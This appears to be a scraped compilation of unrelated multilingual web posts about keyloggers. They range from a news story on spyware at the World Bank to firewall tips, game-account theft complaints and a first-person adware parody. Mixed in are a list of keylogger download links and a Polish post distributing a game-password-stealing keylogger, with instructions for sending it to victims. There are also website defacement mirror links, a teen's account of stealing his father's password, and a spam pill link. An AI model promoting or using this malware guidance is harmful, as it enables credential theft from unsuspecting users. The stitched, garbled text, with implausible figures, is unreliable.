Software major Satyam Computer Services has reportedly been banned from doing any off-shore work with the World Bank after forensic experts and bank investigators discovered that spy software was covertly installed on workstations inside the bank's Washington headquarters, allegedly by one or more contractors from Satyam Computer Services.

According to a FOX News report, apart from Satyam, two IP intrusions have been reported from China, and there have been six intrusions in all.

Investigators say that the software, which operates through a method known as keystroke logging, enabled every character typed on a keyboard to be transmitted to a still-unknown location via the Internet.

Upon its discovery, bank officials shut off the data link between Washington and Chennai, where Satyam has long operated the bank's sole offshore computer center responsible for all of the bank's financial and human resources information.

"I want them off the premises now," World Bank President Robert Zoellick reportedly told his deputies. But at the urging of CIO De Poerck, Satyam employees remained at the bank as recently as October 1 while it engaged in "knowledge transfer" with two new India-based contractors.

Satyam is publicly listed on the New York Stock Exchange and boasts having two billion dollars in sales and more than 150 Fortune 500 companies as clients.

In 2003, Satyam won a lucrative five-year "sole source" contract to design, write and maintain all of the World Bank's information systems. The contract, which began at $10 million, had grown to over $100 million by 2007. This year, the contract was not renewed. Satyam has declined to comment.

FOX News claims that outsiders have raided the World Bank Group's computer network, one of the largest repositories of sensitive data about the economies of every nation, repeatedly for more than a year.

It is still not known how much information was stolen. But sources inside the bank confirm that servers in the institution's highly restricted treasury unit were deeply penetrated with spy software last April. Invaders also had full access to the rest of the bank's network for nearly a month in June and July.

The crisis comes at an awkward moment for Zoellick, who runs the world's largest and most influential anti-poverty agency, which doles out $25 billion a year, and whose board represents 185 member nations.

This weekend, the bank holds its annual series of meetings in Washington, and just in advance of those sessions, Zoellick called for a radical revamping of multilateral organizations in light of the global economic meltdown.

Zoellick is positioning himself and the bank as an institution that can help chart a new path toward global financial stability. But that reputation, more than ever, depends on the bank's stable information infrastructure.

According to internal memos, "a minimum of 18 servers has been compromised," including some of the bank's most sensitive systems, ranging from the bank's security and password server to a Human Resources server "that contains scanned images of staff documents."

One World Bank director told FOX News that as many as 40 servers have been penetrated, including one that held contract-procurement data. It took ten days for bank officials to detect that they'd been invaded. Once they did, they shut down all external servers, except for e-mail, which it turns out the invaders were already using as their entrance point.

What are key loggers?

Keystroke logging (often called key logging) is a method of capturing and recording user keystrokes. The technique and name came from before the era of the graphical user interface; loggers nowadays would expect to capture mouse operations too. Key logging can be useful to determine sources of errors in computer systems, to study how users interact and access with systems, and is sometimes used to measure employee productivity on certain clerical tasks. Such systems are also highly useful for both law enforcement and law-breaking—for instance, providing a means to obtain passwords or encryption keys and thus bypassing other security measures. Key loggers are widely available on the Internet.

Some good Key loggers: (Click to go to download page)

• Key Interceptor
  
• Key Board Spy
  
• Key Log
  

The Indian Neos:

Recently there had been a mammoth increase in the number of Indian hackers. It seems as if after the burst

of IT bubble they have found new employment. A recent attack on Best Western Hotel Consumer Database has put its eight million customer's private information at perils. The information has been repotedly sold at around $2.8 billions in Russian under markets. See more here.

Chciałbym zaprezentować Keyloggera nie mojego autorstwa ,lecz kolegi. Ma on mi.n funkcje wysylania logow na maila.

No to zaczynamy...

KONFIGURACJA
WIec zaczynamy po włączeniu generatora pokazuje nam sie okienko
Ale do niego przejdziemy pożniej.Teraz zakładamy nowe gadu-gadu.Myślę ze nie muszę tłumaczyć jak to zrobic .Teraz przełączamy się z powrotem na okienko programu.W polu klient wpisujemy swój numer gg z którego korzystamy na codzień.Na to gg będą przychodziły nam logi.W polu gg wpisujemy numer nowo założonego gg.Zgadnij co trzeba wpisac w pole haslo tak tam wpisujemy hasło do nowo zalozonego gg.Naciskamy sprawdz gg i jeśli zrobiliśmy wszystko popraweni naszym oczom ukazuje sie otot taki komunikat
w przeciwnym wupadku wyskoczy nam błąd

teraz naciskamy na przycisk generuj i w folderze w ktorym jest program pojawił nam sie nowy plik o nazwie serwer ten plik wysyłamy ofierze(wyłącznie w celach edukacyjnych) i jesli ona go otworzy i wjedzie na swoj account pokaze w ciagu 10 sek wysłane zostaną do nas logi.

TROCHĘ O LOGACH ;]

Znajdują sie w nim takie informacje jak

- Account
- Password
- Nick
- Level
- Status(pacc,facc)
- Domek jesli posiada domek to tez wyswietla w przeciwnym wypadku domek jest puste
- Professia(Druid,Eldder Druid,Sorcerer, Master Sorcerer,Palladyn,Royal Palladyn,Knight,Elite Knight
- świat
- Płeć
- Residence Czyli w jakim mieście mieszka
EQ
- Helmet
- Armor
- Leg'i
- Boots'y

!! Uwaga !! Keylogger dzial poprawnie tylku na Realu na Ots'ach mogą być nie prawdziwe dane albo wogołe moze ich nie być

W czym jest lepszy od reszty ??
Duzą liczbą informacji o postaci chodz nawet sie na nia nie wchodzi
Nie wykrywalnościa
Możliwość wysylania do wielu osob raz wygenerowanego pliku
Łatwość w obsłudze
Wszystko steruje sie poprzez popularny komunikator gadu-gadu

FAQ

1. Czy program jest w pełni darmowy ??

Tak Jest on wpełni darmowy jeśli chcialbyś przekazac mi jakiś datek w postaci wirtualnych pieniedzy,to chętnie przyjme na światach Candia Guardia i Harmonia.

2. Jaki mam w tym interes ??

Nie mam żadnego oprucz wymieninych wyzej dotacji

3.Czy po restarcie komputera program bedzie nadal dzialal

Tak bedzie dzialal nie trzeba wysylac go drugi raz

4.Czy moge go wysłać mailem lub na cd ?

Tak sposób wysyłania jest dowolny

5.Można zmienić nazwe z serwer na jakąś inną ??

Ależ oczywiście można nawet zmienic ikone sa odpowiednie programy do tego ale czasem po zmianie ikonyt może wzrosnąć wykrywalność

6.Czy po używaniu jego moze stac mi sie coś z komputerem.
Nie z twoim komputerem nie dzieje sie nic niepokojącego

7.Jak go usunąć ??

Tajemnica nie mogą wiedzieć wszyscy

8. Czy ofiata musi posiadać odpowiednią wersje GADU-GADU

Nie można je posiadać ale nie trzeba

9.Nie pojawia mi sie serwer w folderze.
Są cztery powody
Sprawdz czy do dobrego folderu patrzysz to nie żart to jest w 80% przyczyną

Sprawdz czy przypadkiem nie masz pliku w rar albo w zip jak tak to go wypakuj

Jeśli jest na pulpicie to utworz dla programu osobny folder

Czasem Av blokuje a niektore nawet po wylonczeniu ich !!!!
Bardzo dziękuje za przeczytanie FAQ bedzie systematycznie

10. Czy jest możliwość oby osoba postronna odczytala moje hasla wpisane w konfiguratorze
Nie.HASŁA SĄ SZYFROWANE.
Chcesz otworz notepadem i spróbuj znalesc swoje hasla

To By bYło na tyle :)

Zapraszam do ściągania :)

http://rapidshare.com/files/152421288/KeyLogger_ISUP.EXE.html

Wkrótce dodam updaty :)

zoneler:
http://zoneservice.org/deface_mirror/?id=92

http://www.deface-h.net/wiev_mirr0r/?id=2257

Her lamer ordan burdan çaldığı script ile mirror sitesi açıyor sonrada böyle afiş oluyor

Hedef: http://maxmirror.org

Mirror: http://www.mirr0r.net/deface_mirror/?id=17854

Sivilharekat.org Hacked

Hala daha net üzerinden vatan millet davasını hit çekmek için kendine maske eden yüzlerce siteden birisi daha hacked

Hedef: http://sivilharekat.org
Mirror: http://www.serapis.net//Pages/mirrorsDisplay?Mirror=93016

Tebrikler vallahi böyle gençlere ihtiyacımız var.. Burada amacın internet ortamının yararlı işler için kullanılması gerektiği vurgulanmış.Ramazan sonrası iyi olmuştur..

Salah satu cara aman melindungi PC anda dari berbagai macam serangan, seperti virus, spyware, trojan, backdoor, keylogger, dan malware di internet adalah dengan memasang aplikasi yang disebut dengan Firewall.

Salah satu aplikasi firewall gratis yang dapat di andalkan adalah PC Tools Firewall Plus. Aplikasi ini sangat mudah digunakan, setelah aplikasi ini diinstal, maka akan secara otomatis dijalankan setiap startup windows. Aplikasi ini sudah mendukung IPv6, dengan aplikasi ini anda dapat mengatur program-program apa saja yang diizinkan atau dilarang untuk terhubung ke internet, selain itu anda juga dapat membuat packet filtering rules.

Dengan mengatur dan memonitor traffic dan aktifitas yang terjadi, terutama saat terhubung dengan internet, maka anda akan lebih aman dalam bekerja, berselancar, dan bermain. Aplikasi ini akan aktif di system tray, untuk melakukan pengaturan anda cukup melakukan klik ganda pada icon aplikasi ini yang berada di system tray. Selamat mencoba.

Informasi:
Situs : http://www.pctools.com/downloads/fwinstall.exe
Ukuran File : 4.556 KB
Kategori : Internet Utility
Lisensi : Freeware
Harga : -
Kebutuhan Sistem : Windows 2000/XP/2003/Vista

Banyaknya cerita-cerita para chatter dan netter tentang tindakan hackingnya

terhadap warnet-warnet membuat penulis menjadi lebih waspada terhadap

komputer-komputer warnet, ini bukan kekhawatiran yang mengada-ada karena

pada awal tahun 2002 penulis pernah iseng melakukan dan mengeruk banyak

password account para netter, dimana ini membuktikan bahwa orang tidak

begitu susah memasang keylogger di warnet pada jaman dulu apalagi saat ini

begitu banyak warnet di Yogya menggunakan DeepFreeze lama. Tapi yang tak

habis pikir permainan yang udah lama usang ini tetap menjadi senjata orang

iseng yang tidak bertanggung jawab untuk mengambil password-password

account orang.

Di kota Gudeg ini penulis hanya mempercayakan acces internet kepada warnet warnet

tertentu saja walaupun mungkin pendapat ini bisa saja berubah diwaktu

yang akan datang, jangan harap warnet dengan penguncian Ctrl + Alt + del

dapat penulis singgahi lagi, apalagi ada warnet yang mengaktifkan program

yang dibuat dengan tidak jelas seperti program yang dibuat dengan Delphi

(terlihat banget Iconnya waktu Alt + Tab Iconnya) karena penulis belum tahu

fungsinya, penulis juga tidak ingin tahu karena penulis tidak mau

menghabiskan waktu untuk menyelidiki hal tersebut apalagi lagi jika misal

admin atau OP tahu jika komputer warnet di utak-atik lebih dalam malah justru

bisa jadi masalah, untuk menghindari hal-hal tersebut lebih baik penulis

menggunakan warnet-warnet yang sudah biasa penulis gunakan, hampir semua

warnet di Yogya pernah penulis kunjungi, rata-rata warnet di Yogya

menggunakan DeepFreeze dan Billing Explorer, ada yang mengganti

DeepFreeze dengan tool lain, itu sah-sah saja tapi bagi pengguna sangat sensitif

terhadap keamanan hal tersebut dapat memunculkan keraguan, karena orang

dapat saja berpikir tidak adanya deepfreeze karena komputer tersebut sudah di

lumpuhkan deepfreezenya dan ada keyloggernya, dan sebagainya.

Terlepas dari penulis sebenarnya hanya mempercayakan acces internet dengan

beberapa langkah yang dilakukan dengan cepat:

1. Restart komputer sebelum biling aktif,karena waktu restart banyak waktu yang bisa kita gunakan dan hemat,misalnya buat pasang Flashdisk,lepas jaket atau tas dan sebagainya,bisa juga buat ke kamar kecil kalau kebelet.
2. Setelah restart dan mengaktifkan biaya sewa internet pertama kali tekan Alt+Ctrl+Shift+F6 untuk melihat bahwa DeepFreeze aktif,ini wajib bagi penulis,tanpa ini penulis tidak akan banyak melakukan aktifitas memasukkan password,kalaupun melakukanya paling mungkin pakai "virtual keyboard".
3. Langkah Ctrl+Alt+Del dilakukan jika misal menggunakan warnet asing/baru tapi jika warnet biasa yang penulis kunjungi kadang langsung lanjut aja tanpa terlalu banyak ngecek asal DeepFreeznya aktif karena kalau kita sewa warnet,maka yang penting adalah kepercayaan terhadap keamanan warnet,karena tanpa itu kenyamanan dan privasi kita menggunakan internet akan sedikit terganggu,jadi pastikan anda menggunakan warnet sesuai dengan pilihan anda.
4. Setelah semua di periksa maka access internetpun dilakukan,penulis tidak banyak melakukan hal yang lebih karena selain masalah waktu juga malas dan tidak mau membuat masalah,tapi walaupun begitu memang yang namanya waspada itu harus,sebagai tambahan penulis pernah mendengar di warnet yang biasa penulis kunjungi,bahwa Deep Freeznya yang di install di komputer warnet telah hilang,kata seorang operator yang kebetulan penulis denger dan waktu penulis periksa dikomputer tersebut ada program "Deep Unfreeze" di drive usernya.Nah di harapkan dengan adanya artikel ini dapat membuat kita lebih waspada terhadap pencurian password dari komputer warnet yang di lakukan oleh orang orang yang tidak bertanggung jawab.

Dikutip dari majalah X-code jilid 2 tahun 2004,hal 45 dan di tulis oleh mas Kurniawan

Niemiecka firma PMC Ciphers, producent programu do szyfrowania danych o nazwie TurboCrypt, postanowiła skutecznie rozprawić się z keyloggerami odczytującymi znaki wprowadzane podczas posługiwania się klawiaturą oraz programami wykradającymi dane za pomocą zrzutów ekranów.

Twórcy oprogramowania wprowadzili dwa dodatkowe zabezpieczenia utrudniające odczytanie wprowadzanych danych oraz wykonywanie zrzutu ekranu bez zezwolenia osoby uprawnionej. Jednym z takich zabezpieczeń ma być wirtualna klawiatura z zaimplementowaną specjalną funkcją odświeżania ekranu z bardzo dużą częstotliwością.

Drugie zabezpieczenie polega na wykorzystaniu funkcji związanych z systemowym harmonogramem zadań, w których odpowiednie rozdysponowanie priorytetów poszczególnym procesom ułatwia identyfikację niepożądanego procesu keyloggera przez program zabezpieczający.

TurboCrypt jest przeznaczony do systemów Windows XP, Windows Vista 32 bit oraz Windows Vista 64 bit. PMC Ciphers zachęca do przetestowania najnowszej wersji oprogramowania TurboCrypt, które można pobrać ze strony producenta.

Źródło: PC Format, Autor : Agnieszka Serafinowicz

Ad esmpio i keylogger sono software che permettono di memorizzare ciò che viene digitato sulla tastiera, molti haker utilizzano questo metodo per acquisire password dal povero malcapitato!

Oppure gli spyware! in poche parole, file pericolosi; soprattuto se si utilizza il computer come terminale per la banca, o per dati importanti!

Oppure posso esserci processi che ci utilizzano la rete o rallentano il pc, oppure fanno moltissime cose dannose!

Ecco come esaminarli!

Aprite il taskmanager,
Spostatevi su processi,
Adesso disponeteli per "nome utente" basta cliccarci sopra, è accanto a nome immagine

Dovrebbe essere piu o meno così:

Ora visualizzerete 4 tipi sotto a nome utente:
1- (tuo nome pc) nel mio caso MASTER
2-SERVIZIO DI RETE
3- SERVIZIO LOCALE
4- SYSTEM

se non avete il 2 o 3 nn vi preoccupate, noi dobbiamo guarda quelli accanto a Master(nome pc):
i principali sono(quelli di windows):
-rundll32.exe
-taskmgr.exe taskmanager
-msnmsgr.exe messenger
-explorer.exe visualizzazione grafica barra start cartelle ecc
-ctfmon.exe file delle scritture niente di pericoloso!

Adesso se ne avete altri, potete consultare qui:

Processlibrary

Non è detto che se avete altri processi siano dannosi! molto spesso ci sono processi della scheda video, delle schede audio o altre cose! però, per essere sicuri di non essere spiati oppure a rischio, perdere 2 minuti del vostro tempo per controllare 3 processi non vi costa niente.
Ricordate: Fidarsi è bene(degli antivirus) non fidarsi è meglio!
Spero di averti aiutato!

Ti è piaciuto l'articolo?
Rimani aggiornato iscriviti ai feed

Dear Chinese/American/What the fuck ever Keylogger/gold farmer.

I hate you. Your risking my account for a few fucking dollars, you ruin someone else's fun for your lazy ass little bitch boy job. Seriously, fuck you, don't give me shit about how it supports you, because you need to find a real fucking job. Don't spend your fucking day getting payed for fucking ruining someone else's fucking fun. I swear to fucking god your one of the worst kind of fucking people on the fucking planet. I hope you fucking get what comes to you when your time comes, because if theres any sense of punishment in this world you'll be fucking punished. Little bitch ass prick. Fuck you, fuck your little job, and fuck your key logging POS software.

----Update----

I have reclaimed my account and received all my items back, update coming in a day or two, then posts should be regular again. Thank you for your patience.

So then he installed this piece o shit program, that does nothing but block out some of the blogs I visit! (no, I'm not talking about the blog that talks about sex, hehe although I do drop by there from time to time hehe) but even normal blogs like Lady Divine! How gay is that? -.-

The first time he installed it he left to the East, where he works, so I took the liberty of restoring my PC back to the previous day, Before Net Nanny, and everything was fine :D

But then!
He was getting back!
And I needed to get the program back, so I thought, it's a simple matter of restoring to After Net Nanny, but noooooooooooo!
Microsoft had to be gay enough to disable access to restore points from a previous month -_-

For those not familiar with a restore point, it's basically a point of your computer's existence to which you can revert to incase all hell breaks loose (:

So then I had to re-install the motherfucking thing! (miss nanny is now going to block my blog for swearing -.- ) So I created my own account and installed it (Dad was still on trial anyway) and to my luck it used the settings that were already in the program folder
:D

The only good feature in the whole thing -_-
So now this stupid piece o shit filters out porno, hate/violence, gambling, drugs/alcohol, intimate apparel(wtf?), Proxy (Doh!), illegal activities( eh? ), Adult/Mature (how is this a different category to porno? ) and yeah that's about it...

So that's what nanny looks like... but you see...
I'm known to quite a lot of my friends as a comp whiz, known to one of my close friends (practically a brother) as "PC Doctor" :P
So when my PC's sick, I fucking heal it -_-
hehe so I went to Download.com and got one of my old pals back on this bitch!

AK Programs' Actual KeyLogger!

So I enabled this knowing fully well that my Nosy ass dad would be checking on the program some time along the week, and he did, and muahahahahaha I got his fucking password, you can see it up there, next to the bit I've sprayed out. I'm sorry I had to spray out my dad's email, in case one of you self righteous bastards tries to inform him of his sons recent escapades, get it Escape Aids xD

Lame, I know.

So now, free of the stupid motherfucking WHORE! that is Net Nanny, I am basking in all my glory listening to the soothing sounds of Emiliana Torrini (:

Woo Hoo!

I am God of this PC.

Don't mess -_-

Stop them! Call the authorities! Thieves! Scoundrels! Muggers! Stop them!

But to no avail, the cultprist are gone, and the vault is now empty. In other words, somebody busted into our guild bank, during the night. 6 tabs of consumables, crafting materials, quest items, uncommon gear and many rare valuables are now gone, lost somewhere in the auction house or the bottomless pockets of vendor NPCs.

(*cry*)

Who's to blame? Keyloggers most probably. Whoever withdrew all the items was one of the guild's officers (non officers have limited bank access), and a short armory investigation proved that he has been stripped from all his gear as well.

What happend exactly? Somewhere during the night, the hijacked officer diligently emptied each and every guild tab, leaving only items that have no vendor value and couldn't be sold quickly over the trade channel (such as low level enchanting mats). Additionally, the hacker seems to be pretty smart, for he also promoted some John Doe to the highest possible rank - a future Torjan Horse mayhap?

In any case, Game Masters have been contacted, and the entire crime is now under investigation. I am not sure if they can reimburse the guild, but I'll keep my fingers crossed.

Who's the blame? The thief, or the society which encourages him?

Ok pay close attention <friend's name> what I am about to tell you must stay on the low down. Matty has been taking these cok pills now for a while and I found two bottles in his glove compartment. He made me promise that I would not tell anyone that he is on them, cause they changed his whole size and life, he told me if I shut up he would tell me where to get them, so he did, they are on http://checkneed.com and not only that, they are totally guarenteed to work fully or all your green back, every penny. http://checkneed.com

Such posts are clearly spam, and are identified as such by the majority of Facebook users. One thing, though, that they all seem unable to recognize, is that the spam is most likely not the result of hacking.

Mostly, this is just an issue of semantics. Nevertheless, I want to make it clear that if Facebook has actually been hacked (and more than once, to boot), then there are a lot of clever people out there who know something that security professionals do not. To "hack" Facebook, one would have to hack Facebook's servers, which have, I imagine, very good security. And even if someone did manage to hack Facebook, the infiltration would be noticed and anything the intruder had done would be reverted. It's also worth noting that if you got admin or root privileges on the Facebook servers, posting spam on people's walls is probably not something you would care about.

I therefore believe that the people who have had their accounts taken over are not the victims of hacking, but rather of either a phishing scam or a keylogger. Given the victims that I know personally, it is my guess that the culprit is a keylogger. Why? Because they're not stupid people and phishing scams are pretty easy to spot—particularly if you use Firefox 3 which won't even load a page if it thinks it's a scam.

A clever keylogger may get around a weak firewall (viz. Windows Firewall) undetected. But, if you have AVG Free, you should be able to detect such keyloggers and get rid of them before they can do any damage.

There is a slight chance that my victim-friends were just sitting in a T-Mobile hotspot or something, and happened to be there at the same time as a spammer who knows of the cookie-spoofing hack as revealed at Black Hat last year. If this is the case, I'd suggest using an SSH tunnel or encrypted VPN.

I’ll accept your invitation, to infect your system, if you download and install either of two rogue Peer to Peer (P2P) applications currently making the rounds on the Internet. BitRoll-5.0.0.0, and Torrent101-4.5.0, are two programs that are used to exchange P2P files that I like to piggyback on.

Just so you know though, I’m pretty lazy so you won’t be able to actually download any files using these bogus applications.

My masters (some might call them cyber-crooks – actually, everyone calls them cyber-crooks), are experts at using false/rogue applications to install malicious code like me.

I’m a pretty neat piece of adware (my masters are pretty smart fellows), since I’ve been designed to display ads from a range of advertisers through pop-up windows, banners ads and so on. Oh, and I’ll automatically switch your Internet Explorer home page to my own search engine. One I particularly like is www.mp3search.com. When searches are made with this engine, the results that you get will be advertising pages that I choose to display.

Just in case you decide that I’m no longer welcome on your computer (that happens to me all the time), I’ll connect every so often to a web page from which I’ll download new files containing variants of myself which will make it difficult to delete all of my active malicious files on your system.

I should tell you that I’m extremely hard to get rid of, and just in case you try to get rid of me, I’ll make over 200+ changes to your Registry Keys. And in case that’s not enough to dissuade you from trying to kick me out, you should know that I have the ability to invite lots of my other adware friends over to party on your system.

I love to monitor your system’s processes, and I can even play with your security applications making them ineffective. Once I’ve done that, I can unleash my keylogger to capture your key strokes and just for fun, I might even scan your email address book so that I can bug your friends.

In my spare time I’m going to look around your operating system for vulnerabilities, because I’m pretty certain, that like many people, you haven’t installed the latest updates nor have you updated your security applications, like you’re supposed to.

Hey man, I’m here for a long, long visit, so think carefully before you offer me that invitation.

Have a good day now.

Elsewhere on this Blog you can read an article on free anti-malware programs, including anti-virus software, and you can download those that may suit your needs.